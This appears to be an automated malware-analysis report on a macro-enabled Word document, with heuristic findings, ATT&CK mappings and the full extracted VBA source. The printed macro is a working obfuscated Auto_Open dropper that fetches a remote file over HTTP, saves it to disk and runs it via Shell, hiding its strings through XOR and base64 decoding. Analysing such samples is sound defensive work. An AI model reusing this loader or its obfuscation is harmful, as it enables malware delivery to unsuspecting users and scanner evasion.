Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro whose Auto_Open routine uses CreateObject to instantiate two COM objects: one issues an HTTP request, the other (ADODB.Stream) writes the response body to disk, and the routine then calls Shell with a decoded command line, most likely to execute the dropped file. Every string that matters (both ProgIDs, the HTTP method and URL, the output path and the Shell command line) is rebuilt at runtime by XOR-decoding numeric arrays against a key that is base64-decoded from a document variable, so none of them appears in the macro source. This is downloader/dropper functionality.
Heuristics (9)

- VBA project inside OOXML [medium] OOXML_VBA (6 related findings)
  Document contains a VBA project; VBA macros present.

- Potential Shell call in VBA [critical] OLE_VBA_SHELL
  Matched line in script:
  Shell (eIQgbFvxyDfZIa(Array((4 + 75), (140 Xor 126), (66 + 41), ((27 Xor 140) + 64), (28 Xor 39), ((141 Xor 74) + (50 Xor 6)), (35 Xor 95), (0 Xor 69), (5 Xor 15), (27 + 70), (3 + (27 Xor 88)), (12 Xor 209), 114, (6 Xor 23), ((3 Xor 5) + (11 Xor 200)), ((8 Xor 0) + 4), (72 Xor 191), ((12 Xor 29) + 95), 122, ((151 Xor 84) + 10), (7 Xor 13), (28 + (26 Xor 32)), ((156 Xor 41) + 35), 59, (16 + 24), (37 Xor 95), (53 + 100)), 99) & eIQgbFvxyDfZIa(Array(((18 Xor 12) + (97 Xor 242)), (175 Xor 64), (96 X …

- VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop dropper, even though the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script:
  .write xfXUInNOTKDYZ.responseBody

- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  Dim xfXUInNOTKDYZ: Set xfXUInNOTKDYZ = CreateObject(eIQgbFvxyDfZIa(Array(181, (46 Xor 154), (119 Xor 250)), 0) & eIQgbFvxyDfZIa(Array(((34 Xor 114) + 115), ((3 Xor 140) + (84 Xor 62)), 71, 148, 155, 192, 7, (26 Xor 40), 243, ((35 Xor 131) + (4 Xor 65)), (84 + (15 Xor 42)), (158 Xor 71), (37 + (28 Xor 73)), 77), (0 Xor 3)))

- CreateObject call [high] OLE_VBA_CREATEOBJ
  Matched line in script:
  Dim xfXUInNOTKDYZ: Set xfXUInNOTKDYZ = CreateObject(eIQgbFvxyDfZIa(Array(181, (46 Xor 154), (119 Xor 250)), 0) & eIQgbFvxyDfZIa(Array(((34 Xor 114) + 115), ((3 Xor 140) + (84 Xor 62)), 71, 148, 155, 192, 7, (26 Xor 40), 243, ((35 Xor 131) + (4 Xor 65)), (84 + (15 Xor 42)), (158 Xor 71), (37 + (28 Xor 73)), 77), (0 Xor 3)))

- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, or documents where source extraction fails, so the finding does not depend on the visible source.

- Auto_Open macro [low] OLE_VBA_AUTO
  Matched line in script:
  Sub Auto_Open()

- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (Referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (Referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (Referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (Referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (Referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (Referenced by macro)
  All six are standard OOXML and Office XML namespace URIs, not an attacker endpoint. The macro's real download URL is decoded at runtime and is not present in the extracted source, so these entries should not be treated as C2 indicators.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact 1: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8059 bytes
SHA-256: b30a599d9e1767eaf3e1a46a6c01bc27a7d0ac7b048b6c41df9a29c298527282

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 34 of 63 identifiers look randomly generated (e.g. 'AjesQypscJuacS'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private uMWtxlWBycGNXo As Boolean
Private OzxgkGbxvLQx(0 To 63) As Byte
Private AgxFTInEUAmFla((0 Xor 0) To (105 Xor 22)) As Byte
Sub Auto_Open()
Dim xfXUInNOTKDYZ: Set xfXUInNOTKDYZ = CreateObject(eIQgbFvxyDfZIa(Array(181, (46 Xor 154), (119 Xor 250)), 0) & eIQgbFvxyDfZIa(Array(((34 Xor 114) + 115), ((3 Xor 140) + (84 Xor 62)), 71, 148, 155, 192, 7, (26 Xor 40), 243, ((35 Xor 131) + (4 Xor 65)), (84 + (15 Xor 42)), (158 Xor 71), (37 + (28 Xor 73)), 77), (0 Xor 3)))
Dim RNQKUlkWcflQvU: Set RNQKUlkWcflQvU = CreateObject(eIQgbFvxyDfZIa(Array(((39 Xor 100) + 71), ((3 Xor 9) + (205 Xor 2)), (35 + 75), 13, ((4 Xor 21) + 5), 141, (99 Xor 177), ((61 Xor 3) + 56), (56 Xor 181)), ((0 Xor 6) + 11)) & eIQgbFvxyDfZIa(Array(187, 24, (47 + (17 Xor 115))), ((0 Xor 3) + (22 Xor 1))))
xfXUInNOTKDYZ.Open eIQgbFvxyDfZIa(Array((187 + 66), 218, 58), 29), eIQgbFvxyDfZIa(Array((149 Xor 105), (5 Xor 67), (28 + 216), 71, ((149 Xor 86) + 38), ((70 Xor 15) + (24 Xor 62))), (16 Xor 48)) & eIQgbFvxyDfZIa(Array((16 Xor 60), (3 Xor 235), 10, (33 Xor 99), (30 Xor 114), 144, 106, (3 Xor 4), (70 Xor 138), (0 + (8 Xor 1)), ((11 Xor 6) + (75 Xor 31)), (52 + (105 Xor 243)), (7 Xor 201), ((86 Xor 252) + (1 Xor 21)), (55 + 142), (125 Xor 228), 45, (56 + 167), (27 Xor 48), 114, 140, 96, 212, (39 + 7), ((0 Xor 10) + 13), 199, ((1 Xor 0) + 1), (39 Xor 120), _
(2 + (58 Xor 164))), ((2 Xor 9) + 27)), False
xfXUInNOTKDYZ.Send
With RNQKUlkWcflQvU
.Type = 1
.Open
.write xfXUInNOTKDYZ.responseBody
.savetofile eIQgbFvxyDfZIa(Array(((30 Xor 89) + 142), (29 + (38 Xor 142)), (31 + (81 Xor 56)), (39 + 1), (57 + (41 Xor 92)), (105 + 142), (23 Xor 11), (100 Xor 138), 209, ((21 Xor 10) + 4), (14 Xor 125), ((14 Xor 16) + (22 Xor 172))), 67) & eIQgbFvxyDfZIa(Array((16 + (2 Xor 0)), (43 + (20 Xor 92)), 14, 242, (166 Xor 119), 106, (16 + (0 Xor 2)), 78, 92, (9 + 13), (34 Xor 119), (14 + (10 Xor 88)), 95, ((6 Xor 23) + 30), (72 + 54), 240, ((0 Xor 30) + (33 Xor 116)), 250, (72 + 37), (87 + 136)), 79), ((1 Xor 3) + 0)
End With
Shell (eIQgbFvxyDfZIa(Array((4 + 75), (140 Xor 126), (66 + 41), ((27 Xor 140) + 64), (28 Xor 39), ((141 Xor 74) + (50 Xor 6)), (35 Xor 95), (0 Xor 69), (5 Xor 15), (27 + 70), (3 + (27 Xor 88)), (12 Xor 209), 114, (6 Xor 23), ((3 Xor 5) + (11 Xor 200)), ((8 Xor 0) + 4), (72 Xor 191), ((12 Xor 29) + 95), 122, ((151 Xor 84) + 10), (7 Xor 13), (28 + (26 Xor 32)), ((156 Xor 41) + 35), 59, (16 + 24), (37 Xor 95), (53 + 100)), 99) & eIQgbFvxyDfZIa(Array(((18 Xor 12) + (97 Xor 242)), (175 Xor 64), (96 Xor 9), (122 Xor 206), ((29 Xor 43) + (10 Xor 150)), _
(93 Xor 44), (131 + (45 Xor 120)), (1 Xor 0), (2 + (0 Xor 2)), ((0 Xor 56) + (10 Xor 78)), (6 + 216), ((16 Xor 101) + (13 Xor 29)), (86 Xor 38), 38, 161, 24, (21 + (35 Xor 119)), ((10 Xor 32) + (94 Xor 155)), 34, (2 + (46 Xor 139)), (158 + (27 Xor 81)), (3 Xor 7), 32, ((6 Xor 35) + (47 Xor 92)), 185, (1 + 2), (25 Xor 186), ((7 Xor 13) + (180 Xor 109)), (34 + (3 Xor 11)), ((36 Xor 162) + (11 Xor 75)), (4 Xor 3), (100 Xor 229), (10 Xor 25), 249, ((21 Xor 78) + (48 Xor 93)), (89 Xor 205), (6 + 16), (15 Xor 28), (10 + 71), (99 Xor 232)), ((100 Xor 3) + (10 Xor 29))))
End Sub
Public Function IcmALVfXRueIf(ByVal DpGmbsecmCqV As String) As Byte()
If Not uMWtxlWBycGNXo Then COqqitRgRInz
Dim pyXmshRggT() As Byte: pyXmshRggT = aTgfjbDnaaql(DpGmbsecmCqV)
Dim OTtOprwMWjBR As Long: OTtOprwMWjBR = UBound(pyXmshRggT) + (1 + 0)
If OTtOprwMWjBR Mod 4 <> ((0 Xor 0) + (0 Xor 0)) Then Err.Raise vbObjectError, , ""
Do While OTtOprwMWjBR > ((0 Xor 0) + 0)
If pyXmshRggT(OTtOprwMWjBR - (0 Xor 1)) <> Asc("=") Then Exit Do
OTtOprwMWjBR = OTtOprwMWjBR - ((1 Xor 0) + 0)
Loop
Dim WLoTTiZXJjbB As Long: WLoTTiZXJjbB = (OTtOprwMWjBR * ((2 Xor 1) + (0 Xor 0))) \ 4
Dim vtuNtKJsjfvF() As Byte
ReDim vtuNtKJsjfvF(0 To WLoTTiZXJjbB - ((1 Xor 0) + 0)) As Byte
Dim RGNGemfZFoS As Long
Dim ZIvgOlBJPQiuC As Long
Do While RGNGemfZFoS < OTtOprwMWjBR
Dim kCMSreDqugPQet As Byte: kCMSreDqugPQet = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + 1
Dim RONoLBwgfDCXA As Byte: RONoLBwgfDCXA = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + 1
Dim tpuVPhRJlM As Byte: If RGNGemfZFoS < OTtOprwMWjBR Then tpuVPhRJlM = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + (1 + 0) Else tpuVPhRJlM = Asc("A")
Dim WdQMIofXMTH As Byte: If RGNGemfZFoS < OTtOprwMWjBR Then WdQMIofXMTH = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + (1 Xor 0) Else WdQMIofXMTH = Asc("A")
If kCMSreDqugPQet > (39 Xor 88) Or RONoLBwgfDCXA > (116 + (1 Xor 10)) Or tpuVPhRJlM > 127 Or WdQMIofXMTH > 127 Then _
Err.Raise vbObjectError, , ""
Dim KztlamNUzN As Byte: KztlamNUzN = AgxFTInEUAmFla(kCMSreDqugPQet)
Dim dkdpZlwVcI As Byte: dkdpZlwVcI = AgxFTInEUAmFla(RONoLBwgfDCXA)
Dim nDplkDFxBlvNy As Byte: nDplkDFxBlvNy = AgxFTInEUAmFla(tpuVPhRJlM)
Dim AjesQypscJuacS As Byte: AjesQypscJuacS = AgxFTInEUAmFla(WdQMIofXMTH)
If KztlamNUzN > (50 Xor 13) Or dkdpZlwVcI > ((9 Xor 32) + 22) Or nDplkDFxBlvNy > (7 + (35 Xor 27)) Or AjesQypscJuacS > (34 Xor 29) Then _
Err.Raise vbObjectError, , ""
Dim gUHHQqGupZjEY As Byte: gUHHQqGupZjEY = (KztlamNUzN * (4 Xor 0)) Or (dkdpZlwVcI \ &H10)
Dim IcFGwJeFkEYDz As Byte: IcFGwJeFkEYDz = ((dkdpZlwVcI And &HF) * &H10) Or (nDplkDFxBlvNy \ ((1 Xor 0) + (2 Xor 1)))
Dim mBJlqHfIivjei As Byte: mBJlqHfIivjei = ((nDplkDFxBlvNy And (0 + (0 Xor 3))) * &H40) Or AjesQypscJuacS
vtuNtKJsjfvF(ZIvgOlBJPQiuC) = gUHHQqGupZjEY: ZIvgOlBJPQiuC = ZIvgOlBJPQiuC + 1
If ZIvgOlBJPQiuC < WLoTTiZXJjbB Then vtuNtKJsjfvF(ZIvgOlBJPQiuC) = IcFGwJeFkEYDz: ZIvgOlBJPQiuC = ZIvgOlBJPQiuC + 1
If ZIvgOlBJPQiuC < WLoTTiZXJjbB Then vtuNtKJsjfvF(ZIvgOlBJPQiuC) = mBJlqHfIivjei: ZIvgOlBJPQiuC = ZIvgOlBJPQiuC + 1
Loop
IcmALVfXRueIf = vtuNtKJsjfvF
End Function
Private Sub COqqitRgRInz()
Dim bhwZmPvUchx As Integer, hmulLjFfVTL As Integer
hmulLjFfVTL = 0
For bhwZmPvUchx = Asc("A") To Asc("Z"): OzxgkGbxvLQx(hmulLjFfVTL) = bhwZmPvUchx: hmulLjFfVTL = hmulLjFfVTL + ((1 Xor 0) + (0 Xor 0)): Next
For bhwZmPvUchx = Asc("a") To Asc("z"): OzxgkGbxvLQx(hmulLjFfVTL) = bhwZmPvUchx: hmulLjFfVTL = hmulLjFfVTL + (0 Xor 1): Next
For bhwZmPvUchx = Asc("0") To Asc("9"): OzxgkGbxvLQx(hmulLjFfVTL) = bhwZmPvUchx: hmulLjFfVTL = hmulLjFfVTL + (0 + 1): Next
OzxgkGbxvLQx(hmulLjFfVTL) = Asc("+"): hmulLjFfVTL = hmulLjFfVTL + (1 + 0)
OzxgkGbxvLQx(hmulLjFfVTL) = Asc("/"): hmulLjFfVTL = hmulLjFfVTL + 1
For hmulLjFfVTL = (0 + 0) To ((63 Xor 84) + 20): AgxFTInEUAmFla(hmulLjFfVTL) = 255: Next
For hmulLjFfVTL = 0 To (56 + 7): AgxFTInEUAmFla(OzxgkGbxvLQx(hmulLjFfVTL)) = hmulLjFfVTL: Next
uMWtxlWBycGNXo = True
End Sub
Private Function aTgfjbDnaaql(ByVal DpGmbsecmCqV As String) As Byte()
Dim dkdpZlwVcI() As Byte: dkdpZlwVcI = DpGmbsecmCqV
Dim mkniCDPsJkV As Long: mkniCDPsJkV = (UBound(dkdpZlwVcI) + (1 + (0 Xor 0))) \ ((2 Xor 0) + 0)
If mkniCDPsJkV = 0 Then aTgfjbDnaaql = dkdpZlwVcI: Exit Function
Dim nDplkDFxBlvNy() As Byte
ReDim nDplkDFxBlvNy((0 Xor 0) To mkniCDPsJkV - 1) As Byte
Dim DUQyelPqGIzypz As Long
For DUQyelPqGIzypz = (0 Xor 0) To mkniCDPsJkV - (1 + 0)
Dim bhwZmPvUchx As Long: bhwZmPvUchx = dkdpZlwVcI(2 * DUQyelPqGIzypz) + (87 + (93 Xor 244)) * CLng(dkdpZlwVcI(2 * DUQyelPqGIzypz + 1))
If bhwZmPvUchx >= 256 Then bhwZmPvUchx = Asc("?")
nDplkDFxBlvNy(DUQyelPqGIzypz) = bhwZmPvUchx
Next
aTgfjbDnaaql = nDplkDFxBlvNy
End Function
Private Function eIQgbFvxyDfZIa(cxknVmYSLrB As Variant, VXJwVypQzz As Integer)
Dim PwdRsyBnnEFR As String
Dim WQAuXOcmKXZ() As Byte
WQAuXOcmKXZ = IcmALVfXRueIf(ActiveDocument.Variables("XRICEIzuoraJhzas"))
PwdRsyBnnEFR = ""
For hmulLjFfVTL = LBound(cxknVmYSLrB) To UBound(cxknVmYSLrB)
PwdRsyBnnEFR = PwdRsyBnnEFR & Chr(WQAuXOcmKXZ(hmulLjFfVTL + VXJwVypQzz) Xor cxknVmYSLrB(hmulLjFfVTL))
Next
eIQgbFvxyDfZIa = PwdRsyBnnEFR
End Function

Artifact 2: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 20480 bytes
SHA-256: 2a9725521de20f962818604c08527db153fb4e23c4ef8dffaf1fce1812643dd2

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 84 of 152 identifiers look randomly generated (e.g. 'kCMSreDqugPQet'), consistent with name-mangling obfuscation.

ClamAV reports nothing for either artifact, which is expected here: every ProgID, URL, path and command line exists only after runtime decoding, so there is no plaintext indicator for a signature to match. The behavioural heuristics above (auto-exec plus CreateObject, HTTP-to-disk and Shell sinks) are what carry the verdict.